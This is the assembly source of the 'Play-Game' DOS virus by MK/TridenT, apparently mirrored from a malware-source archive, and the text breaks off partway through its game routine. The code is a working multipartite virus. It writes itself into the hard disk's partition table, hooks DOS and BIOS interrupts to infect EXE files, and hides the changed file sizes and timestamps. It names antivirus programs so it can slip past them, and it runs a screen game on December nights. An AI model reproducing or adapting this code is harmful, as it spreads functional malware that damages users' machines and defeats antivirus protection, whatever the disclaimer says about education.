mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
1266 lines
44 KiB
NASM
1266 lines
44 KiB
NASM
;------------------------------------------------------------------------------
|
||
; Play-Game VIRUS version 1
|
||
;
|
||
; Use TASM 2.01 to compile this source
|
||
; (other assemblers will probably not produce the same result)
|
||
;
|
||
; Disclaimer:
|
||
; This file is only for educational purposes. The author takes no
|
||
; responsibility for anything anyone does with this file. Do not
|
||
; modify this file!
|
||
;------------------------------------------------------------------------------
|
||
|
||
|
||
.model tiny
|
||
.RADIX 16
|
||
.code
|
||
|
||
|
||
VERSION equ 1
|
||
FILELEN equ offset last - first ;Length of virus.
|
||
VIRSEC equ (FILELEN+1FF)/200 ;Number of sectors for virus
|
||
VIRKB equ (FILELEN+3FF+100)/400 ;Length in kB.
|
||
SECLEN equ 200 ;length of a sector.
|
||
STACKLEN equ 200 ;Wanted length of stack in
|
||
;infected file.
|
||
STACKOFF equ ((FILELEN+SECLEN+STACKLEN+11)/2)*2 ;Stack offset in
|
||
;infected file.
|
||
DATAPAR equ (SECLEN+STACKLEN+20)/10 ;Minimal extra memory to
|
||
;allocate for infected file
|
||
;(area to load part. table
|
||
;and room for stack).
|
||
BUFLEN equ 1C ;Length of buffer.
|
||
BOOTLEN equ boot_end - boot_begin ;Length of boot-routine.
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Data area for virus.
|
||
;------------------------------------------------------------------------------
|
||
|
||
org 00F0
|
||
|
||
hook db ? ;Flag for hooking int21
|
||
minibuf db (4) dup (?) ;Mini buffer for internal use.
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Data area for game.
|
||
;------------------------------------------------------------------------------
|
||
|
||
bombs db ? ;Number of bombs.
|
||
pos db ? ;Position.
|
||
oldpos db ? ;Previous position.
|
||
level db ?
|
||
kleur db ?
|
||
timer db ?
|
||
tijd dw ?
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Begin of virus, installation in partition table of harddisk
|
||
;------------------------------------------------------------------------------
|
||
|
||
org 0100
|
||
|
||
first: db '[ MK / TridenT ]' ;Author + Group.
|
||
|
||
call next
|
||
next: pop si ;Get IP.
|
||
sub si,13 ;Calculate relative offset.
|
||
mov di,0100
|
||
cld
|
||
|
||
call push_all ;Save some registers.
|
||
|
||
push cs ;Make DS and ES equal to CS.
|
||
push cs
|
||
pop ds
|
||
pop es
|
||
|
||
mov ah,30 ;Check if DOS version >= 4.0
|
||
int 21
|
||
cmp al,4
|
||
jb not_install
|
||
|
||
cmp ax,0DEADh ;Check if another TridenT
|
||
je not_install ;(multi-partite) virus is
|
||
;resident.
|
||
|
||
mov ax,0FE02 ;Check if Tequila virus
|
||
int 21 ;is resident.
|
||
cmp ax,01FDh
|
||
je not_install
|
||
|
||
mov ax,33E4 ;Check if virus is already
|
||
int 21 ;resident.
|
||
cmp ah,0A5
|
||
je not_install
|
||
|
||
call infect_part
|
||
|
||
not_install: mov ah,2A ;Ask date.
|
||
int 21
|
||
cmp dh,12d ;december?
|
||
jb dont_play
|
||
mov ah,2C ;Ask time.
|
||
int 21
|
||
cmp ch,21d ;time > 21:00 ?
|
||
jb dont_play
|
||
|
||
mov ax,33E5 ;Play the game!
|
||
int 21
|
||
|
||
dont_play: call pop_all ;Restore registers.
|
||
|
||
add si,offset buffer-100
|
||
cmp byte ptr cs:[si],'M' ;Check if generation 0.
|
||
je entryE
|
||
|
||
int 20 ;It was a COM file (gen. 0).
|
||
|
||
entryE: mov bx,ds ;Calculate CS.
|
||
add bx,low 10
|
||
mov cx,bx
|
||
add bx,cs:[si+0E]
|
||
cli ;Restore SS and SP.
|
||
mov ss,bx
|
||
mov sp,cs:[si+10]
|
||
sti
|
||
add cx,cs:[si+16]
|
||
push cx ;Push new CS on stack.
|
||
push cs:[si+14] ;Push new IP on stack.
|
||
retf
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Infect partition table sector
|
||
;------------------------------------------------------------------------------
|
||
|
||
infect_part: lea bx,[si+last-100] ;Read partition table
|
||
mov ax,0201 ;at end of virus.
|
||
mov cx,1
|
||
mov dx,80
|
||
int 13
|
||
jc not_infect_par
|
||
|
||
cmp word ptr [bx],'KM' ;Check if already infected.
|
||
je not_infect_par
|
||
|
||
cmp word ptr [bx],05EA ;Check if infected with
|
||
je not_infect_par ;Stoned or Michelangelo.
|
||
|
||
lea di,[bx+01BE] ;Check partition info.
|
||
mov bl,4
|
||
check_part: cmp byte ptr [di+4],0 ;Skip if not a valid partition.
|
||
je next_part
|
||
cmp word ptr [di+0A],0 ;Enough room for virus?
|
||
jne next_part
|
||
cmp word ptr [di+8],VIRSEC+2
|
||
jb not_infect_par ;Quit if not enough room.
|
||
next_part: add di,10
|
||
dec bl
|
||
jnz check_part
|
||
|
||
lea bx,[si+last-100] ;Save original partition table
|
||
mov ax,0301 ;to sector 2.
|
||
mov cx,2
|
||
int 13
|
||
jc not_infect_par
|
||
|
||
lea bx,[si+first-100] ;Write the virus to sector 3.
|
||
mov ax,0300+VIRSEC
|
||
mov cx,3
|
||
int 13
|
||
jc not_infect_par
|
||
|
||
lea di,[si+last-100] ;Infect part table.
|
||
lea si,[si+boot_begin-100]
|
||
mov bx,di
|
||
mov cx,BOOTLEN
|
||
rep movsb
|
||
|
||
mov ax,0301 ;Write infected partition table
|
||
mov cx,1 ;to sector 1.
|
||
int 13
|
||
|
||
not_infect_par: ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Partition table routine
|
||
;------------------------------------------------------------------------------
|
||
|
||
boot_begin: db 'MK' ;Signature (= DEC BP, DEC BX).
|
||
|
||
cld ;Initialise segments + stack.
|
||
cli
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov ss,ax
|
||
mov sp,7C00
|
||
sti
|
||
|
||
mov di,0400 ;Adjust memory size.
|
||
mov ax,ds:[di+13]
|
||
sub ax,VIRKB
|
||
mov ds:[di+13],ax
|
||
|
||
mov cl,6 ;Calculate segment for
|
||
shl ax,cl ;resident virus.
|
||
mov es,ax
|
||
|
||
mov cx,BOOTLEN ;Copy virus to top.
|
||
mov si,sp ;SP=7C00
|
||
xor di,di
|
||
rep movsb
|
||
|
||
mov bx,offset here-offset boot_begin ;Jump to top.
|
||
push es
|
||
push bx
|
||
retf
|
||
|
||
here: mov ax,0200+VIRSEC ;Load complete virus.
|
||
mov cx,3
|
||
mov dx,0080
|
||
mov bx,0100
|
||
int 13
|
||
jc load_part
|
||
|
||
cli
|
||
mov ax,offset ni13 ;Set new vector 13.
|
||
xchg ds:[4*13],ax
|
||
mov cs:[oi13],ax ;Save old vector 13.
|
||
mov ax,es
|
||
xchg ds:[4*13+2],ax
|
||
mov cs:[oi13+2],ax
|
||
|
||
les bx,ds:[4*21] ;Get original vector 21.
|
||
mov cs:[oi21],bx
|
||
mov cs:[oi21+2],es
|
||
sti
|
||
|
||
mov byte ptr cs:[hook],1 ;Turn on hook-flag.
|
||
|
||
load_part: mov di,5
|
||
push ds
|
||
pop es
|
||
part_loop: mov ax,0201 ;Load original part. sector.
|
||
mov cx,2
|
||
mov dx,0080
|
||
mov bx,sp
|
||
int 13
|
||
jnc jump_part
|
||
|
||
xor ax,ax ;Reset Drive
|
||
int 13
|
||
dec di
|
||
jnz part_loop ;Try again.
|
||
int 18 ;Error: activate ROM BASIC.
|
||
|
||
jump_part: push ds ;Push next address.
|
||
push bx
|
||
retf
|
||
boot_end:
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Int 13 handler
|
||
;------------------------------------------------------------------------------
|
||
|
||
ni13: cmp byte ptr cs:[hook],0 ;Is int 21 already hooked?
|
||
je do_int13
|
||
|
||
push ds
|
||
push es
|
||
push bx
|
||
push ax
|
||
cli
|
||
|
||
xor ax,ax
|
||
mov ds,ax
|
||
|
||
les bx,ds:[4*21] ;Compare int 21 vector
|
||
mov ax,es ;with saved old vector.
|
||
|
||
cmp ax,800
|
||
ja dont_hook
|
||
cmp bx,cs:[oi21]
|
||
jne hook_21
|
||
cmp ax,cs:[oi21+2]
|
||
je dont_hook
|
||
|
||
hook_21: mov cs:[oi21],bx ;Save old vector 21.
|
||
mov cs:[oi21+2],ax
|
||
|
||
mov ds:[4*21],offset ni21 ;Set new vector 21.
|
||
mov ds:[4*21+2],cs
|
||
|
||
mov byte ptr cs:[hook],0 ;Don't hook int 21 anymore.
|
||
|
||
dont_hook: sti
|
||
pop ax
|
||
pop bx
|
||
pop es
|
||
pop ds
|
||
|
||
|
||
do_int13: cmp cx,1 ;Check if part. table
|
||
jne orgint13 ;is read or written.
|
||
cmp dx,80
|
||
jne orgint13
|
||
cmp ah,2
|
||
jb orgint13
|
||
cmp ah,3
|
||
ja orgint13
|
||
or al,al
|
||
jz orgint13
|
||
|
||
push cx
|
||
dec al
|
||
jz nothing_left
|
||
push ax ;Do original function
|
||
push bx
|
||
add bx,0200
|
||
inc cx
|
||
pushf
|
||
call dword ptr cs:[oi13]
|
||
pop bx
|
||
pop ax
|
||
|
||
nothing_left: mov al,1 ;Read/write redirected
|
||
mov cx,2 ;partition table.
|
||
pushf
|
||
call dword ptr cs:[oi13]
|
||
pop cx
|
||
retf 2
|
||
|
||
|
||
orgint13: db 0EA
|
||
oi13 dw 0, 0 ;Original int 13 vector.
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Interupt 21 handler
|
||
;------------------------------------------------------------------------------
|
||
|
||
ni21: pushf
|
||
|
||
cmp ax,33E4 ;Installation-check ?
|
||
jne not_ic
|
||
mov ax,0A500+VERSION ;Yes? Return a signature.
|
||
popf
|
||
iret
|
||
|
||
not_ic: cmp ax,33E5 ;Play game ?
|
||
jne not_pg
|
||
call play_game
|
||
popf
|
||
iret
|
||
|
||
not_pg: call push_all ;Check if interupt came from
|
||
call getname ;a program that may not see
|
||
mov dx,offset namesHI ;true length of infected file
|
||
mov cx,2+11d ;(AV program or 'DIR').
|
||
call checknames
|
||
call pop_all
|
||
jne no_hide
|
||
|
||
cmp ah,11 ;Findfirst/findnext FCB?
|
||
je its_11_12
|
||
cmp ah,12
|
||
jne not_11_12
|
||
its_11_12: popf
|
||
call findFCB
|
||
retf 2
|
||
|
||
not_11_12: cmp ah,4E ;Findfirst/findnext handle?
|
||
je its_4E_4F
|
||
cmp ah,4F
|
||
jne no_hide
|
||
its_4E_4F: popf
|
||
call findhndl
|
||
retf 2
|
||
|
||
|
||
no_hide: call push_all ;Save registers.
|
||
|
||
cmp ax,6C00 ;Open from DOS 4.0+ ?
|
||
jne not_6C00
|
||
call f_open2
|
||
jmp short exit
|
||
|
||
not_6C00: cmp ah,3Dh ;File open?
|
||
jne not_3D
|
||
call f_open
|
||
jmp short exit
|
||
|
||
not_3D: cmp ah,3E ;File close?
|
||
jne not_3E
|
||
call f_close
|
||
jmp short exit
|
||
|
||
not_3E: cmp ax,4B00 ;Program execute?
|
||
jne exit
|
||
call f_execute
|
||
|
||
exit: call pop_all ;Restore registers.
|
||
|
||
popf
|
||
|
||
db 0EA ;Original int 21.
|
||
oi21 dw 0, 0
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Interupt 24 handler
|
||
;------------------------------------------------------------------------------
|
||
|
||
ni24: mov al,3 ;To avoid 'Abort, Retry, ...'
|
||
iret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Call original int21
|
||
;------------------------------------------------------------------------------
|
||
|
||
DOS: pushf
|
||
call dword ptr cs:[oi21]
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Hide the virus from filelength
|
||
;------------------------------------------------------------------------------
|
||
|
||
findFCB: call DOS ;Call original function.
|
||
or al,al
|
||
jne ret1
|
||
pushf
|
||
push bx
|
||
push ax
|
||
push es
|
||
mov ah,2F ;Ask DTA adres.
|
||
call DOS
|
||
cmp byte ptr es:[bx],0FF ;Extended FCB?
|
||
jne vv1
|
||
add bx,7
|
||
vv1: mov al,byte ptr es:[bx+17] ;Check if infected
|
||
and al,1Fh ;(seconds=62).
|
||
cmp al,1Fh
|
||
jne dont_hide
|
||
sub word ptr es:[bx+1Dh],FILELEN ;Hide virus length.
|
||
sbb word ptr es:[bx+1F],0
|
||
dec bx
|
||
jmp short hide_time
|
||
|
||
|
||
findhndl: call DOS ;Call original function.
|
||
jc ret1
|
||
pushf
|
||
push bx
|
||
push ax
|
||
push es
|
||
mov ah,2F ;ask DTA adres
|
||
call DOS
|
||
mov al,byte ptr es:[bx+16] ;Check if infected.
|
||
and al,1Fh
|
||
cmp al,1Fh
|
||
jne dont_hide
|
||
sub word ptr es:[bx+1A],FILELEN ;Hide virus length.
|
||
sbb word ptr es:[bx+1C],0
|
||
hide_time: and byte ptr es:[bx+16],0EFh ;Also hide seconds.
|
||
dont_hide: pop es
|
||
pop ax
|
||
pop bx
|
||
popf
|
||
ret1: ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Try to infect or disinfect the file
|
||
;------------------------------------------------------------------------------
|
||
|
||
f_close: cmp bx,5 ;Is handle >= 5?
|
||
jb ret1 ;Quit if not.
|
||
mov ah,45 ;Duplicate handle
|
||
jmp short doit
|
||
|
||
f_execute: mov ah,3Dh ;Open file
|
||
doit: call DOS
|
||
jc ret1
|
||
xchg ax,bx
|
||
mov bp,1 ;Flag for infect.
|
||
jmp short get_ctrlbrk
|
||
|
||
|
||
f_open2: mov dx,si ;Use 'normal' open function
|
||
mov ah,3Dh ;instead of 6C00 function.
|
||
f_open: call DOS
|
||
jc ret1
|
||
xchg ax,bx
|
||
xor bp,bp ;Flag for disinfect.
|
||
|
||
|
||
get_ctrlbrk: cld
|
||
|
||
mov ax,3300 ;Get ctrl-break flag.
|
||
call DOS
|
||
push dx
|
||
|
||
cwd ;Disable Ctrl-break.
|
||
inc ax
|
||
push ax
|
||
call DOS
|
||
|
||
mov dx,bx
|
||
mov ax,3524 ;Get int24 vector.
|
||
call DOS
|
||
push bx
|
||
push es
|
||
mov bx,dx
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov dx,offset ni24 ;Install new int24 handler.
|
||
mov ah,25
|
||
push ax
|
||
call DOS
|
||
|
||
mov ax,1220 ;Get pointer to file table
|
||
push bx
|
||
int 2F
|
||
mov bl,es:[di]
|
||
mov al,16 ;(Avoid [512] signature...)
|
||
mov ah,12
|
||
int 2F
|
||
pop bx ;ES:DI -> file table
|
||
|
||
push es
|
||
pop ds
|
||
|
||
push [di+2] ;Save attribute & open-mode.
|
||
push [di+4]
|
||
|
||
cmp word ptr [di+28],'XE' ;Check if extension is .EXE
|
||
jne close1
|
||
cmp byte ptr [di+2A],'E'
|
||
jne close1
|
||
|
||
; cmp word ptr [di+20],'XX' ;Check if name is 'XX*.EXE'
|
||
; jne close1 ;(only for test purposes).
|
||
|
||
test bp,bp ;Infect or disinfect?
|
||
jz check_disinf
|
||
|
||
mov ax,word ptr [di+20] ;Check if file may be infected.
|
||
mov dx,offset namesSC
|
||
mov cx,11d+4
|
||
call checknames
|
||
je close1
|
||
jmp short go_on
|
||
|
||
check_disinf: call getname ;Check if file must be
|
||
mov dx,offset namesSC ;disinfected (only if an
|
||
mov cx,11d ;AV program is active).
|
||
call checknames
|
||
jne close1
|
||
|
||
go_on: mov byte ptr [di+2],2 ;Open file for both read/write.
|
||
mov byte ptr [di+4],0 ;Clear attributes
|
||
call gotobegin
|
||
push ax ;Save old file offset
|
||
push dx
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov cx,BUFLEN ;Read begin of file
|
||
mov si,offset buffer ;into buffer.
|
||
mov dx,si
|
||
call read
|
||
|
||
call checkfile ;Check if file is OK to infect
|
||
jc close2 ;or disinfect.
|
||
|
||
mov ax,word ptr [si+12] ;Already infected?
|
||
add al,ah
|
||
cmp al,'#'
|
||
je is_infected
|
||
|
||
test bp,bp ;Must it be infected?
|
||
jz close2
|
||
|
||
call do_infect
|
||
|
||
is_infected: test bp,bp ;Must it be disinfected?
|
||
jnz close2
|
||
|
||
call do_disinfect
|
||
|
||
close2: push es
|
||
pop ds
|
||
|
||
pop dx ;Restore file offset.
|
||
pop ax
|
||
call goto
|
||
or byte ptr [di+6],40 ;Don't change file-time.
|
||
|
||
close1: mov ah,3E ;Close the file.
|
||
call DOS
|
||
|
||
or byte ptr [di+5],40 ;No EOF on next close.
|
||
pop [di+4] ;Restore attribute & open-mode.
|
||
pop [di+2]
|
||
|
||
pop ax ;Restore int 24 vector.
|
||
pop ds
|
||
pop dx
|
||
call DOS
|
||
|
||
pop ax ;Restore ctrl-break flag.
|
||
pop dx
|
||
call DOS
|
||
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Special filenames
|
||
;------------------------------------------------------------------------------
|
||
|
||
namesHI db 'CO', '4D' ;COMMAND.COM and 4DOS.
|
||
namesSC db 'SC', 'CL', 'VS', 'NE' ;AV programs.
|
||
db 'HT', 'TB', 'VI', 'F-'
|
||
db 'FI', 'GI', 'IM'
|
||
namesCH db 'RA', 'FE', 'MT', 'BR' ;Some self-checking
|
||
;programs.
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Check the file
|
||
;------------------------------------------------------------------------------
|
||
|
||
checkfile: cmp word ptr [si],'ZM' ;Is it a normal EXE ?
|
||
jne not_good
|
||
|
||
cmp word ptr [si+18],40 ;Check if it is a windows/OS2
|
||
jb not_win ;EXE file.
|
||
|
||
mov ax,003C ;Read pointer to NE header.
|
||
cwd
|
||
call readbytes
|
||
jc not_good
|
||
|
||
mov ax,word ptr [si+BUFLEN] ;Read NE header.
|
||
mov dx,word ptr [si+BUFLEN+2]
|
||
call readbytes
|
||
jc not_good
|
||
|
||
cmp byte ptr [si+BUFLEN+1],'E' ;Quit if it is a NE
|
||
je not_good ;header.
|
||
|
||
not_win: call getlen
|
||
call calclen ;Check for internal overlays.
|
||
cmp word ptr [si+4],ax
|
||
jne not_good
|
||
cmp word ptr [si+2],dx
|
||
jne not_good
|
||
|
||
cmp word ptr [si+0C],0 ;High memory allocation?
|
||
je not_good
|
||
|
||
cmp word ptr [si+1A],0 ;Overlay nr. not zero?
|
||
jne not_good
|
||
|
||
clc ;File is OK.
|
||
ret
|
||
|
||
not_good: stc ;File is not OK.
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Write virus to the program
|
||
;------------------------------------------------------------------------------
|
||
|
||
do_infect: call getlen ;Go to end of file.
|
||
call goto
|
||
|
||
mov dx,0100 ;Write virus.
|
||
mov cx,FILELEN
|
||
call write
|
||
cmp ax,cx ;Are all bytes written?
|
||
jne not_infect
|
||
|
||
call getoldlen ;Calculate new CS & IP.
|
||
mov cx,0010
|
||
div cx
|
||
sub ax,word ptr [si+8]
|
||
add dx,low 10
|
||
|
||
mov word ptr [si+16],ax ;Put CS in header.
|
||
mov word ptr [si+0E],ax ;Put SS in header.
|
||
mov word ptr [si+14],dx ;Put IP in header.
|
||
mov word ptr [si+10],STACKOFF ;Put SP in header.
|
||
|
||
call getlen ;Put new length in header.
|
||
call calclen
|
||
mov word ptr [si+4],ax
|
||
mov word ptr [si+2],dx
|
||
|
||
push di
|
||
lea di,[si+0A] ;Adjust mem. allocation info.
|
||
call mem_adjust
|
||
lea di,[si+0C]
|
||
call mem_adjust
|
||
pop di
|
||
|
||
call gotobegin ;Write new begin of file.
|
||
in al,40
|
||
mov ah,'#'
|
||
sub ah,al
|
||
mov word ptr [si+12],ax
|
||
mov cx,BUFLEN
|
||
mov dx,si
|
||
call write
|
||
|
||
or byte ptr es:[di+0Dh],1F ;set filetime to 62 sec.
|
||
|
||
not_infect: ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Disinfect the program
|
||
;------------------------------------------------------------------------------
|
||
|
||
do_disinfect: call getoldlen ;Go to original end of file
|
||
add ax,(offset buffer-100)
|
||
adc dx,0
|
||
call goto ;Go to buffer in virus.
|
||
|
||
mov dx,si ;Read buffer.
|
||
mov cx,BUFLEN
|
||
call read
|
||
|
||
cmp word ptr [si],'ZM' ;Is there an EXE header
|
||
jne not_disinfect ;in the buffer?
|
||
|
||
call gotobegin ;Write the buffer to
|
||
mov dx,si ;begin of file.
|
||
mov cx,BUFLEN
|
||
call write
|
||
|
||
call getoldlen ;Restore original length
|
||
mov es:[di+11],ax ;of file.
|
||
mov es:[di+13],dx
|
||
|
||
and byte ptr es:[di+0Dh],0E0 ;Seconds = 0.
|
||
|
||
not_disinfect: ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Get name of current process
|
||
;------------------------------------------------------------------------------
|
||
|
||
getname: push ds
|
||
push bx
|
||
|
||
mov ah,62 ;Get PSP address.
|
||
call DOS
|
||
dec bx
|
||
mov ds,bx
|
||
mov ax,ds:[0008] ;Get first 2 characters
|
||
;of current process name.
|
||
pop bx
|
||
pop ds
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Check names
|
||
;------------------------------------------------------------------------------
|
||
|
||
checknames: push di
|
||
push es
|
||
|
||
push cs ;Search name in list CS:DX
|
||
pop es
|
||
mov di,dx
|
||
repnz scasw
|
||
|
||
pop es
|
||
pop di
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Calculate length for EXE header
|
||
;------------------------------------------------------------------------------
|
||
|
||
calclen: mov cx,0200 ;Divide by 200h
|
||
div cx
|
||
or dx,dx ;Correction?
|
||
jz no_cor
|
||
inc ax
|
||
no_cor: ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Adjust mem allocation info in EXE header
|
||
;------------------------------------------------------------------------------
|
||
|
||
mem_adjust: cmp word ptr [di],DATAPAR ;Enough memory allocated?
|
||
jnb mem_ok
|
||
mov word ptr [di],DATAPAR ;Minimum amount to allocate.
|
||
mem_ok: ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Read a few bytes
|
||
;------------------------------------------------------------------------------
|
||
|
||
readbytes: call goto ;Go to DX:AX and read 4 bytes
|
||
mov dx,offset minibuf ;from that location into
|
||
mov cx,4 ;mini-buffer.
|
||
read: mov ah,3F
|
||
call DOS
|
||
ret
|
||
|
||
write: mov ah,40 ;Write function.
|
||
call DOS
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Get original length of program
|
||
;------------------------------------------------------------------------------
|
||
|
||
getoldlen: call getlen
|
||
sub ax,FILELEN
|
||
sbb dx,0
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Get length of program
|
||
;------------------------------------------------------------------------------
|
||
|
||
getlen: mov ax,es:[di+11]
|
||
mov dx,es:[di+13]
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Goto new offset DX:AX
|
||
;------------------------------------------------------------------------------
|
||
|
||
gotobegin: xor ax,ax
|
||
cwd
|
||
goto: xchg ax,es:[di+15]
|
||
xchg dx,es:[di+17]
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Push all registers on stack
|
||
;------------------------------------------------------------------------------
|
||
|
||
push_all: push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push si
|
||
push di
|
||
push bp
|
||
push ds
|
||
push es
|
||
mov bp,sp
|
||
jmp [bp+12]
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Pop all registers from stack
|
||
;------------------------------------------------------------------------------
|
||
|
||
pop_all: pop ax
|
||
mov bp,sp
|
||
mov [bp+12],ax
|
||
pop es
|
||
pop ds
|
||
pop bp
|
||
pop di
|
||
pop si
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Game
|
||
;------------------------------------------------------------------------------
|
||
|
||
play_game: call rnd_init ;Initialize random number
|
||
;generator.
|
||
mov ah,0F ;Get video mode.
|
||
int 10
|
||
|
||
xor ah,ah ;Clear screen and set to
|
||
push ax ;40 column mode.
|
||
mov al,1
|
||
int 10
|
||
|
||
mov ah,3 ;Clear cursor.
|
||
int 10
|
||
push cx
|
||
mov ah,1
|
||
xor cx,cx
|
||
int 10
|
||
|
||
start_game: push cs
|
||
push cs
|
||
pop ds
|
||
pop es
|
||
|
||
xor al,al ;Clear screen
|
||
call scroll_screen
|
||
|
||
mov si,offset orgvalues ;Initialize parameters.
|
||
mov di,offset bombs
|
||
movsw
|
||
xor ax,ax
|
||
stosw
|
||
stosw
|
||
stosw
|
||
|
||
mov dx,0B800 ;ES points to screen memory.
|
||
mov es,dx
|
||
|
||
mov si,offset beginmess ;Print first message.
|
||
mov di,40d*2*5+20d
|
||
mov cx,12d
|
||
call print_it2
|
||
|
||
mov di,40d*2*9+4
|
||
mov cl,20d
|
||
call print_it2
|
||
|
||
mov di,40d*2*20d+24d
|
||
mov cl,16d
|
||
call print_it
|
||
|
||
call wachttoets ;Wait for keypress or timeout.
|
||
|
||
xor al,al ;Clear screen.
|
||
call scroll_screen
|
||
|
||
main_lup: mov al,byte ptr [oldpos] ;Clear old position.
|
||
call gotopos
|
||
mov ax,0700
|
||
stosw
|
||
|
||
mov al,byte ptr [pos]
|
||
mov byte ptr [oldpos],al
|
||
|
||
mov al,1 ;Scroll screen up.
|
||
call scroll_screen
|
||
|
||
mov al,byte ptr [pos] ;Goto current position.
|
||
call gotopos
|
||
mov al,es:[di] ;Hit a block?
|
||
cmp al,0FE
|
||
mov ax,0E02 ;Print smily face.
|
||
stosw
|
||
je stop_game
|
||
|
||
call print_bombs ;Print a number of bombs.
|
||
|
||
call wacht
|
||
|
||
in al,61 ;Make 'click' sound.
|
||
push ax
|
||
or al,3
|
||
out 61,al
|
||
|
||
call check_key ;Check for shift keys.
|
||
|
||
pop ax ;Turn 'click' off
|
||
out 61,al
|
||
|
||
inc byte ptr [timer] ;Check timer.
|
||
mov al,byte ptr [timer]
|
||
and al,7F
|
||
jnz not_zero
|
||
inc byte ptr [kleur] ;Change color and number of
|
||
inc byte ptr [bombs] ;bombs every 128th row.
|
||
|
||
not_zero: cmp al,12d
|
||
jne main_lup
|
||
|
||
inc byte ptr [level] ;Increase level as soon as
|
||
cmp byte ptr [level],9 ;new color has reached.
|
||
jb main_lup ;position. Maximum is 9.
|
||
|
||
|
||
stop_game: mov ax,0E07 ;Beep!
|
||
int 10
|
||
|
||
mov si,offset endmess ;Print message 'You reached..'.
|
||
mov di,40d*2*24d
|
||
mov cx,18d
|
||
call print_it
|
||
|
||
mov al,byte ptr [level] ;Print reached level.
|
||
add al,30
|
||
stosw
|
||
|
||
add di,20d ;Print message 'Play again?'.
|
||
mov cl,11d
|
||
call print_it
|
||
|
||
|
||
call wachttoets ;Wait for key or timeout.
|
||
jz stop_echt
|
||
or al,20
|
||
cmp al,'y' ;Play again if 'Y' was
|
||
jne stop_echt ;pressed.
|
||
jmp start_game
|
||
|
||
stop_echt: pop cx
|
||
mov ah,1
|
||
int 10
|
||
|
||
pop ax ;clear screen
|
||
int 10
|
||
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Print CX characters from DS:SI to ES:DI
|
||
;------------------------------------------------------------------------------
|
||
|
||
print_it: lodsb
|
||
mov ah,7
|
||
stosw
|
||
loop print_it
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Print CX characters from DS:SI to ES:DI (wide)
|
||
;------------------------------------------------------------------------------
|
||
|
||
print_it2: lodsb
|
||
mov ah,7
|
||
stosw
|
||
mov al,20
|
||
stosw
|
||
loop print_it2
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Go to position on screen.
|
||
;------------------------------------------------------------------------------
|
||
|
||
gotopos: cbw
|
||
shl ax,1
|
||
mov di,40d*2*12d
|
||
add di,ax
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Scroll the screen up AL rows
|
||
;------------------------------------------------------------------------------
|
||
|
||
scroll_screen: push bx
|
||
mov ah,06
|
||
mov bh,7
|
||
mov cx,0
|
||
mov dx,(25d-1)*100+(40d-1)
|
||
int 10
|
||
pop bx
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Print some bombs at bottom row.
|
||
;------------------------------------------------------------------------------
|
||
|
||
print_bombs: mov cl,byte ptr [bombs] ;Number of bombs.
|
||
xor ch,ch
|
||
bomb_lup: call rnd_get ;Calculate position.
|
||
cmp al,(40d-1)
|
||
ja bomb_lup
|
||
cbw
|
||
shl ax,1
|
||
mov di,40d*2*(25d-1)
|
||
add di,ax
|
||
mov al,byte ptr [kleur] ;Calculate color.
|
||
mov bx,offset colors
|
||
xlat
|
||
xchg ah,al
|
||
mov al,0FE ;Print bomb.
|
||
stosw
|
||
loop bomb_lup
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Wait a short time.
|
||
;------------------------------------------------------------------------------
|
||
|
||
wacht: mov dx,word ptr [tijd]
|
||
add dx,2
|
||
xor ax,ax
|
||
mov ds,ax
|
||
time_lup: mov ax,ds:[046C] ;Get current time.
|
||
cmp ax,dx
|
||
jb time_lup
|
||
|
||
push cs
|
||
pop ds
|
||
mov word ptr [tijd],ax
|
||
ret
|
||
|
||
|
||
;------------------------------------------------------------------------------
|
||
; Wait for timeout or keypress.
|
||
;------------------------------------------------------------------------------
|
||
|
||
wachttoets: mov ah,1 ;Empty keyboard buffer.
|
||
int 16
|
||
jz now_empty
|
||
xor ah,ah
|
||
int 16
|
||
jmp short wachttoets
|
||
|
||
now_empty: xor ax,ax
|
||
mov ds,ax
|
||
mov dx,ds:[046C]
|
||
add dx,18d*8
|
||
wt_lup: mov ah,1 ;Check key.
|
||
int 16
|
||
jnz stop_waiting
|
||
mov ax,ds:[046C] ;Check time.
|
||
cmp ax,dx
|
||
